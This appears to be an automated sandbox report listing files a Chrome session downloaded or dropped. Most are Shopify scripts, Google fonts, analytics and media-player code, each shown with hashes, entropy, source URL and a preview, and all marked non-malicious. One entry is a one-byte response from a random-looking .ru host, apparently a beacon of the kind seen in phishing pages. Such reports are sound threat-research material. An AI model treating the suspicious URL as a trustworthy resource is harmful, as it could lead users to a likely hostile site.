                                                                    SHA-256:28D33FCD04D73BE3768AE3FEB22BB8B0A630491940362990A9FF145CA7BBD016
                                                                    SHA-512:973D3977E0C44E3DC3AD98CC2618193339B41F29F2EA6C58A2BAE47382F2EA2E93BA34B1865717FF999A6F3079FC965E344B1FE6407A43DD44D1380203213456
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.visme.co/fonts/css/VISME13526.css
                                                                    Preview:@font-face{font-family:SuperscriptNumbersFontFix;font-style:normal;font-weight:400;src:url(../fonts/VISME13526/NotoSans-Regular.woff) format('woff');unicode-range:U+2070,U+b9,U+b2-b3,U+2074-2079}@font-face{font-family:SuperscriptNumbersFontFix;font-style:normal;font-weight:400;src:url(../fonts/VISME13526/NotoSans[wdth,wght].woff) format('woff');unicode-range:U+2070,U+b9,U+b2-b3,U+2074-2079}@font-face{font-family:SuperscriptNumbersFontFix;font-style:italic;font-weight:400;src:url(../fonts/VISME13526/NotoSans-Italic.woff) format('woff');unicode-range:U+2070,U+b9,U+b2-b3,U+2074-2079}@font-face{font-family:SuperscriptNumbersFontFix;font-style:italic;font-weight:400;src:url(../fonts/VISME13526/NotoSans-Italic[wdth,wght].woff) format('woff');unicode-range:U+2070,U+b9,U+b2-b3,U+2074-2079}@font-face{font-family:SuperscriptNumbersFontFix;font-style:normal;font-weight:700;src:url(../fonts/VISME13526/NotoSans-Bold.woff) format('woff');unicode-range:U+2070,U+b9,U+b2-b3,U+2074-2079}@font-face{font-
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, hostcomputer=imagery4], progressive, precision 8, 1065x459, components 3
                                                                    Category:dropped
                                                                    Size (bytes):25341
                                                                    Entropy (8bit):7.9027177095160575
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A8BD315942269F82D9E97DFDBCA08473
                                                                    SHA1:5CCECDF211D27870DDA68866303BC4189C70E5F4
                                                                    SHA-256:62F42A4D4435E085421BC44A1C8AFD6D60751D50E5EB70649B977F1CDA136335
                                                                    SHA-512:CABE3BBC7FE73DF0C8B8B049D5288A2396D8F1D1B8255ED4FDEDEFC97EF7F77FE53F78964E85ECB0BFBF315698EA6B5C482FF54882A464E9224D68282AC31E36
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:......JFIF.............,Exif..II*.......<...............imagery4...................................+......+&.%#%.&D5//5DNB>BN_UU_wqw................................+......+&.%#%.&D5//5DNB>BN_UU_wqw...........).."..........5...................................................................t..+.[Z.21d*..Z.l..VEz*..QEE..TQQEE..TQQEE..TQQEE..TQQEE)Mci....30..#3...30..#3...30..#3..\yJ*(.....*(.....*(.....*(.....:U....`.........(..:..n...~].;.7.jO.....5....~.@.IK.%....[bB#;.q..z]....oqo?...H.............r;..^Yx..L.o....................N.[/..............:2.v0....=.)m.n...KH...sG6...i......6.OP....Vr..../.O..y...............?.'Co:J.'9*4$...BJ..*4$...BJ..*4$...BJ..*4$...BJ..*4$...BJ..*4$...BJ..*4$...BJ..*4$...BJ..*4$...BJ..*4$...BJ..*4$...6$...BJ..-#bJ..*4$...U&......^.........[d..r"D.DB..............\T..................................A;.....D.}t.ZV.M..6..'...-Ko......<......D.7.:<`.P....:%>g.)...#4_.....|[.".tl'w.u.......8..1.9.42...,..[.g_!...Z.n..Q.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (3107)
                                                                    Category:downloaded
                                                                    Size (bytes):3108
                                                                    Entropy (8bit):5.517947681776297
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EF75E95B339900F2F53A1B1A7FE35298
                                                                    SHA1:62C5ADB2BF566C2274635814BA9979EB0165A995
                                                                    SHA-256:036F453B47D48BA12DB6925F57B8F540C8DE6121097B7573472574E6E1C68712
                                                                    SHA-512:AB38601492309C5213BE4FEB17C2C943D23E40A6CD5069F7EE75EAC3E0DFD21981BFBF476EDFE97F659BE4FE1BC7C0D7885B02C1F21FA2C9812785B99D844935
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZPCN7UGW.js
                                                                    Preview:import{d as x,e as L,g as I}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TBYT574J.js";import{a as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-GF3AKGJL.js";import{b as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{$ as E,I as y,J as P,T as r,X as A,Y as n,aa as F,ba as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{b as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as C}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as S}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";function H(){let{site:e,canonicalUrl:t}=r(),p=A(),{signupTypes:m=[]}=n(),{signu
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):3305
                                                                    Entropy (8bit):4.947830515275973
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:588AE6C3404D22F5A482EDF04C053AA6
                                                                    SHA1:60AA3C7FF65FEBBAEB0146043CA3E97A6C222711
                                                                    SHA-256:FBD8A986014B3EC011B4ADD6C2733E406CA1526E255963779071592E7A5203E0
                                                                    SHA-512:9D7659AE551B87ECDE339D9977ABD9A0ED85CF6AE1223509F2BA61018E5F9E573C6E00A3D69B77F93FC225FB28B8ABF8A3C34CCB7B41DC660092F6968C23517C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="95" height="65" viewBox="0 0 95 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="93" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1549_7115)">.<path d="M29.1576 20H33.2481L28.2642 28.3533L33.2481 38.623H29.04L24.7849 29.0904H24.7379V38.623H21V20H24.7379V27.9602H24.7849L29.1576 20Z" fill="black"/>.<path d="M37.8091 32.186L33.1543 20H37.2213L39.8778 27.8619L42.7224 20H46.5308L41.5469 32.186V38.623H37.8091V32.186Z" fill="black"/>.<path d="M48.4346 38.623V20H52.1725V35.5273H57.7441V38.623H48.4346Z" fill="black"/>.<path d="M63.2916 20H59.5537V38.623H63.2916V20Z" fill="black"/>.<path d="M65.0801 38.623V20H74.8127V22.8745H68.7945V27.4688H74.3426V30.3188H68.7945V35.773H75.0008V38.623H65.0801Z" fill="black"/>.<path d="M48.8573 40.9326V43.9546C48.8573 44.5196 48.4341 44.8882 47.7054 44.8882C46.9767 44.8882 46.6475 44.5688 46.6475 43.8563V43.5369H47.4468V43.8563C47.4468 44.1511 47.5174 44.3231 47.7524 44.3231C47.9875 44.3231 48.0815 44.2002
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):6338
                                                                    Entropy (8bit):4.105739762379346
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:68388F12CE9FAEF230ADA91E20F69CC2
                                                                    SHA1:E215873C3A69CBE1730E3D9F1BD67E7FF47A226B
                                                                    SHA-256:3377C2E195DA1BFA22901E742CFD5D760C48DF4C09FE66C819AF927F6AB45813
                                                                    SHA-512:E13451A9D6767F93BEAFDBD56F76B5BC075D3EA0DDDB716CE6B7BB952FED7F4604609750EFE6AE582928CDB562D1E9883F05E31F210697185457461140F1305A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/68388f12ce9faef230ada91e20f69cc2.svgz
                                                                    Preview:<svg width="140" height="65" viewBox="0 0 140 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="138" height="63" rx="7.79" fill="white"/>.<path d="M48.7216 26.488C48.7216 31.1333 48.7216 35.7786 48.7216 40.424C48.5573 40.4759 45.6247 40.4932 45.3479 40.4413C45.3479 34.2907 45.3479 28.1402 45.3479 21.9637C45.4258 21.9551 45.495 21.9551 45.5642 21.9551C46.8618 21.9551 48.1593 21.9551 49.4483 21.9464C49.604 21.9464 49.6818 22.007 49.7683 22.1195C51.3427 24.2215 52.9258 26.315 54.5002 28.417C55.7545 30.0866 57.0088 31.7561 58.2718 33.417C58.3151 33.4776 58.367 33.5381 58.4102 33.5987C58.4275 33.59 58.4362 33.59 58.4535 33.5814C58.4535 29.7146 58.4535 25.8478 58.4535 21.9637C59.5867 21.9637 60.6939 21.9637 61.8358 21.9637C61.8358 22.0589 61.8358 22.1541 61.8358 22.2406C61.8358 27.1627 61.8358 32.0762 61.8358 36.9983C61.8358 37.6039 61.8358 38.2094 61.8358 38.8063C61.8358 39.6973 61.2216 40.3894 60.3393 40.4672C59.7424 40.5191 59.2407 40.2855 58.8687 39.8098C58.323
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:downloaded
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://rkq.6gniu68.ru/GOnzIfZMvkXQkmOYZRXcGWYoSvZUERGSKZKQCZMFTTBTURDEZDRJOCTJQJEAWNJCDZNAVSIOPNWCNI
                                                                    Preview:1
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (3255)
                                                                    Category:downloaded
                                                                    Size (bytes):3302
                                                                    Entropy (8bit):5.107146290758044
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:54456B3F652C26977631DF62BAD39172
                                                                    SHA1:4685B5405D3C104732F37CA833D4D2EA9DB47785
                                                                    SHA-256:B531954A197B2F6DFA16DA607EA4C3AF918E727D0E34D732768CD8E6533BC6BD
                                                                    SHA-512:5799C180A5CCC980272B9F855A097809730F42153C72FAB5106EF5E4D49EF621BA59A562BC1A251D912A1C813CD155A49627623BA1AE1F8EB43D6398B92370F3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://storage.googleapis.com/workbox-cdn/releases/6.2.0/workbox-core.prod.js
                                                                    Preview:this.workbox=this.workbox||{},this.workbox.core=function(t){"use strict";try{self["workbox:core:6.2.0"]&&_()}catch(t){}const e=(t,...e)=>{let n=t;return e.length>0&&(n+=" :: "+JSON.stringify(e)),n};class n extends Error{constructor(t,n){super(e(t,n)),this.name=t,this.details=n}}const r=new Set;const o={googleAnalytics:"googleAnalytics",precache:"precache-v2",prefix:"workbox",runtime:"runtime",suffix:"undefined"!=typeof registration?registration.scope:""},i=t=>[o.prefix,t,o.suffix].filter((t=>t&&t.length>0)).join("-"),s={updateDetails:t=>{(t=>{for(const e of Object.keys(o))t(e)})((e=>{"string"==typeof t[e]&&(o[e]=t[e])}))},getGoogleAnalyticsName:t=>t||i(o.googleAnalytics),getPrecacheName:t=>t||i(o.precache),getPrefix:()=>o.prefix,getRuntimeName:t=>t||i(o.runtime),getSuffix:()=>o.suffix};function c(){return(c=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t}).apply(this,argumen
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):1120
                                                                    Entropy (8bit):4.946932301499327
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:06D9542924F2850C5846DE1B94627CB9
                                                                    SHA1:BC3E14DDAF36161765D481AFA717E156EF056C4C
                                                                    SHA-256:D453B53D9FF10A630080D24563478935F3D1B10DE8EB15BEF9F13FE58BE3F8DE
                                                                    SHA-512:89DA505BA08C06160AA9CD66B15CA53503E0600F2485045985A4ACE32D3DDF5A9DA66A7FC5FF1AEF252B1D386CF0F25645D58FB55A217F533766220C1DB5848E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="24" cy="24" r="24" fill="#F4FAFE"/>.<circle cx="24" cy="24" r="17" fill="#E9F4FF"/>.<path d="M23.25 19C23.25 20.2426 22.2426 21.25 21 21.25C19.7574 21.25 18.75 20.2426 18.75 19C18.75 17.7574 19.7574 16.75 21 16.75C22.2426 16.75 23.25 17.7574 23.25 19Z" stroke="#2168F2" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.<path d="M26.25 21.25C27.4926 21.25 28.75 20.2426 28.75 19C28.75 17.7574 27.4926 16.75 26.25 16.75" stroke="#2168F2" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.<path d="M21 21.75C17.6 21.75 16.75 23.5 16.75 26.25H18.75V29.25C18.75 30.3546 19.6454 31.25 20.75 31.25H21.25C22.3546 31.25 23.25 30.3546 23.25 29.25V26.25H25.25C25.25 23.5 24.4 21.75 21 21.75Z" stroke="#2168F2" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>.<path d="M26.25 21.25C29.65 21.25 30.75 23.5 30.75 26.25H28.75V29.25C28.75 30.3546 27.85
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (5955)
                                                                    Category:downloaded
                                                                    Size (bytes):259557
                                                                    Entropy (8bit):5.57286824649818
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:14EFDAF8B8574CF08A9D957DFD7A4562
                                                                    SHA1:68B3BE749F395438BB37C2EBC8744B521EB6FBFC
                                                                    SHA-256:56AFEAAA720ECF06A6281167CED8E2F72ADEEA40754390A13F0E176FC80A2936
                                                                    SHA-512:BB7FD61D874A84B52D970014320157B139A10CD608EAAA36F1321A026CA0B7228675269D6CC368C0B2933A696DDCAF66A13AF57578D35A0644782CD96EB6B2D6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-W6NECZNE63&l=dataLayer&cx=c
                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_auto_events","priority":19,"vtp_enableScroll":false,"vtp_enableOutboundClick":false,"vtp_enableDownload":false,"vtp_enableHistoryEvents":false,"vtp_enableForm":false,"vtp_enableVideo":false,"vtp_enablePageView":true,"tag_id":111},{"function":"__ogt_1p_data_v2","priority":9,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 362 x 414, 8-bit colormap, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):53626
                                                                    Entropy (8bit):7.975129565013672
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:0A4E24F1A035CF579F575FC4CDEEE18D
                                                                    SHA1:F5B1EF8E6D4EE7A00FD944A94668FE82F531D78A
                                                                    SHA-256:5140F1AB2DA1A34E66BE0186A7D3C31303A468BD06786E17F22B58E2F4D1F2FE
                                                                    SHA-512:F2776CEAC5D034083C3554AD3F425CC339BDD910552CB4F20F710F92E05F21B8EA77FBA961E252B6BB3F4CCC7459600C5A118B0431AEA8B0ED521B05ACCF4745
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.PNG........IHDR...j................$eXIfII*.......<...............imagery4..'=......PLTE........................GpL.............................................Th.....................................Rf.................)+*..............&9_B_................I]y.........=Tw.|Z,...uU.......x..#............a000.|BVsA..Nb~....t...EZx..n ..............7....M.k.......%&#.(E......:Mo...w ,>dH.%.bE>$!...6$...h6B_ 2X..3Fi......q.-+:...........2...lO...,...?,....}&.!;........0..R9......d..q.y.8Vk.P:&.]B\0....+8R.XM{J,ZD2....(.....N...4nD*..eL<...\....:7<DAF...a;#.....j:..X;....$sV@U62.~bL"......YXYxE.gw...r........uus.U+.iN......CfUK.g{bNOMO.P......L...ihf....}C........|}pbv.....m_S.iJ.b*.......W..v........`...o7..Y\nw...]o..c....[.....Q.w_CNf....^......tP....n.l]......M...#{l.X%..h.*5....NF.~[....p.B.|O...K-H.........tRNS.... ..._.......IDATx..A.. .E.h2."..Fb..s.......M......1U.vP..w...v....|.........o5..P...m......e).~D.Ce.... ..M$..q.]...=.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (3068)
                                                                    Category:downloaded
                                                                    Size (bytes):4495
                                                                    Entropy (8bit):5.32666002661806
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B26BF930E289149EB852C9F0F1FFF713
                                                                    SHA1:8DF09EC8152ABA0635040CBA9B895BF9D4F98AE2
                                                                    SHA-256:0EAAE71610A06256716D3332DBF86CA9DFF77BE966A4FE8DEFE289AC262D52D9
                                                                    SHA-512:088421A46C6C3DAB984A244A9E383C09BFE8D96D43D490426B396C74A0040F9484C9EB3F70B6B2B29396C6B021F2AC34A470F52768BAB9D42BFB6666E404B929
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/36-78cef22492e8977e4f25fd6db11d2a93.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[36],{1493:./*!******************************************************************************!*\. !*** ../player/components/media/video/hlsJsVideo/hlsJsVideo.tsx + 1 modules ***!. \******************************************************************************/./*! exports provided: default */./*! all exports used */./*! ModuleConcatenation bailout: Cannot concat with ../player/components/media/video/Video.tsx */./*! ModuleConcatenation bailout: Cannot concat with ../player/components/utils/customHooks/useMux.ts */./*! ModuleConcatenation bailout: Cannot concat with ../player/components/utils/customHooks/useStoreSelector.ts */./*! ModuleConcatenation bailout: Cannot concat with ../player/components/utils/errorBoundary/logError.ts (<- Module is referenced from these modules with unsupported syntax: ./shell/middlewares/chunk-loader.js (referenced with cjs require)) */./*! ModuleConcatenation bailout: Cannot concat with ../player/state/
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (491)
                                                                    Category:downloaded
                                                                    Size (bytes):492
                                                                    Entropy (8bit):5.297156783595652
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4E136CB3DA36F7D8120B1C951DDB3E5D
                                                                    SHA1:478E0BC5B20A7B590473E16B2A672D1A3FC5CC9B
                                                                    SHA-256:63E67CDA88CAF1544B24ABBAA5188855FA65375636E2AF6414686071AA008E1D
                                                                    SHA-512:7F1EB0DB9F7FF0012E47D1E10B4B5CEC5A30D88EEAD7FACA55AEE2FA648DD20983910613B0030B23BE8508B090EE0CB437100168765C965FCA67656315B541BC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-JKCUGZSP.js
                                                                    Preview:import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var e=t(o()),i=r=>(0,e.jsx)("svg",{viewBox:"0 0 10 8",fill:"none","aria-hidden":"true",focusable:"false",...r,children:(0,e.jsx)("path",{d:"M0.75 4.75L3 7.25L9.25 0.75",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})}),n=i;export{n as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 23040, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):23040
                                                                    Entropy (8bit):7.990788476764561
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:DE69CF9E514DF447D1B0BB16F49D2457
                                                                    SHA1:2AC78601179C3A63BA3F3F3081556B12DDCAF655
                                                                    SHA-256:C447DD7677B419DB7B21DBDFC6277C7816A913FFDA76FD2E52702DF538DE0E49
                                                                    SHA-512:4AEBB7E54D88827D4A02808F04901C0D09B756C518202B056A6C0F664948F5585221D16967F546E064187C6545ACEF15D59B68D0A7A59897BD899D3E9DDA37B1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ.woff2
                                                                    Preview:wOF2......Z........8..Y...........................B.p.`..D....e.....d.....B..6.$..v. .....E.K...5l\e.v.~S$}.".8.....5.E....s...ai`W.u..8a2C..JuBj....x.....%.u.C.......p..c...7...+.1.GS.3...F_....-..`#........]...T.....x*....&..{.....V..,..&~$D.#.P..|gzz...B.7..m.3....HH.l.....Dj.F.X.....U..+.Q...T.`...ST...1...0....io`zu@.J2....3]}0.X...,..+"...............(k.CGl......`.y.._....3.t!O.,X:t.3....lw..U../:..b.]....V.$.y....G....*.H..IN....bQ.+ \@....;...C3...c.l..i/....#..I.).Y...]...s..$K!..Tr...g%|r.D.#.Y{..R..We...X.?...*r.@...G.{..>..4^..b..,.z........T..[.ru#.7..{..G....J.3......Lz.C].of$Y2..^...>@L..P.........7..bB.....6f...ec.i..{._\...A.I.Lcy.Qm".....k.^.d.K(x7U...c.o.......}.T......iL..!.Z.......[O..*.%...*'?........^I./..;t.4%.....S...4....wY.b9.%.b...,.....tC..9.Z...V..CHnA.S.-.u$m.\....7{,..K{(.."....._...|{.VowE@E@@..Zg.....`8..b..Z...^....l+...R..%.L.b...._..E.j9\+.L.#J.........?&...&..scE..b..Jc.8...V....L 1./k.3..7w....x..-.....
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1466)
                                                                    Category:downloaded
                                                                    Size (bytes):1467
                                                                    Entropy (8bit):5.271346190151709
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E6AE2B13EA1BA62413BCD9DE9DD2E364
                                                                    SHA1:942DA0283FBAC6DFA8BB43FB0BE96E31C6633BED
                                                                    SHA-256:EB7AB80D410B232B6314CEA8AB4584DF3797BA5771ED13BE2DCDDBCFF89CA99C
                                                                    SHA-512:C464F9DD8939A05742F6FF7ECF7BF0FB3B6681F5C6ED23A054BCFC9FC77088E363166B58DB0AFACEBDE69906F6D202A3B7FBB25AC1754F3627457ECE8FE4C68C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LKGIZDZ2.js
                                                                    Preview:import{b as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-IK3X57EU.js";import{d as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js";import{a as T}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as f}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var d=f(T());var u=e=>{let t=e?.currentTarget instanceof HTMLFormElement?e?.currentTarget:e?.target,a=e?.submitter||e?.target,{action:m}=t,r=e.defaultPrevented,n="",o;r&&(o=Array.from(t.elements).find(i=>i instanceof HTMLInputElement&&i.validationMessage),o&&(n=`${o.name||o.id}: ${o?.validationMessage}`));let{componentTree:s=""}=p(t,!1),{componentTree:c=""}=p(a,!0);return{formEl:t,submitterEl:a,errorEl:o,hasError:r,action:m,message:n,componentTree:s,submitterComponentTree:c}};var k=e=>{let{trackers:t,store:a}=l();return r=>{let n;r&&(n=u(r)),e({trackers:t,store:a,ev
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):3065
                                                                    Entropy (8bit):5.341274186548861
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:613A4793DA60DD7A4D223DAB722DD1ED
                                                                    SHA1:78F79AC59F2374783498CF2747AF934C5A9C5C8E
                                                                    SHA-256:1B7C2BA7A81B7DDCD008C9595045C69E49F6759C3F64F715DDBC284BA039AFD2
                                                                    SHA-512:91AB684D881F63840305A966500C4C416640CFA653F0BE27D34897A411C29ECA4E1976FF69BFAFB3CC430E5A47162D2284DA3ADC0F066FB98508AE654B141472
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:"https://fonts.googleapis.com/css?family=Lato:300,400,400i,700&display=swap"
                                                                    Preview:/* latin-ext */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qJCY.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwaPGR_p.woff2) format('woff2');. unicode-range: U+01
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1315)
                                                                    Category:downloaded
                                                                    Size (bytes):1316
                                                                    Entropy (8bit):5.277062005232271
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B631878E8D39CB7975D2643C1688D6BF
                                                                    SHA1:30BBD223E31648F4359C900F89ACFD656B529C90
                                                                    SHA-256:945D5C41685AE3083CF539FCEB3EAB8A866CD19D8404830ACE343761D3863803
                                                                    SHA-512:75286D347615F4F130DED3367B8B04FE3BF0C20C1CDF919AB651251EDEE2B3F94D6981D619EE869512EBFF6B1DF5FAAD851DC7136E263A886479F36B1AD6841D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EM5M5Y6T.js
                                                                    Preview:import{a as E}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MOSJSY7P.js";import{a as b}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var u=m(b());var d=m(b()),M=(e,s,t)=>{(0,d.useEffect)(()=>{if(!e.current)return;let r=typeof t=="function"?t():t,c=new MutationObserver(s);return Array.isArray(e.current)?e.current.forEach(a=>{a&&c.observe(a,r)}):e.current&&c.observe(e.current,r),()=>{c.disconnect()}},[e,s,t])};var x="a, button, textarea, input, select, [tabindex], [contenteditable], iframe",L=(e,s=!1,t=x)=>{let[r,c]=(0,u.useState)([]),l=(0,u.useCallback)(()=>{e.current&&c([...e.current.querySelectorAll(t)].filter(n=>!n.hasAttribute("tabindex")||n.getAttribute("tabindex")!=="-1"))},[e,t]);(0,u.useEffect)(()=>{l()},[e,s,l]),M(e,()=>{l()},{childList:!0,subtree:!0});let a=r[0],o=r[r.length-1],p=n=>{if(n.shi
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 37552, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):37552
                                                                    Entropy (8bit):7.994547037473551
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:5C6E4FE5D8680F1B834C192EE03C566D
                                                                    SHA1:5D8FEB6C49B960A2161C5A070B95B38108C5046C
                                                                    SHA-256:7CDCB8DAFD2F35EC642986935ED106E2C36F93E2A3143297A98CDCF00351744B
